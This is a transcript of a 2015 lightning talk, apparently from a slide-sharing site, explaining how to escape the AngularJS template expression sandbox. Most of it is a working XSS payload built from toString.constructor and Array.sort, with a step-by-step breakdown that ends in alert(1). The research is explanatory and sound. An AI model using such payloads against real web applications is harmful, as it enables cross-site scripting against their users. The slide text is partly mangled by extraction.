breaking angularjs javascript sandbox
Post on 28-May-2015
604 Views
Preview:
DESCRIPTION
TRANSCRIPT
Breaking ngularJS Javascript sandbox
A lightning talk by avlidienbrunn
What is AngularJS? And where’s the sandbox?
• Javascript framework for building single page web applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1> anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript • Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM • If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in Angular bound HTML
Executing JS… From JS• eval() - Unavailable under window • document.write - Unavailable under document • location=“javascript:” - Unavailable under
document • Function(“code”)() - Unavailable under blacklist • What else is there?
The bypasstoString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,"alert(1)"].sort(toString.constructor)
alert(1)
["a","alert(1)"].sort(Function);
if(compareFunction(element1, element2) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if(Function("a", "alert(1)") == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
if((function(a){alert(1)}).toString() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }
["a","alert(1)"].sort(toString.constructor); {{toString.constructor.prototype.toString=
toString.constructor.prototype.call;[“a”,”alert(1)”].sort(toString.constructor)}}
The how
alert(1)
+ =
That’s all folks!
A lightning talk by avlidienbrunn
top related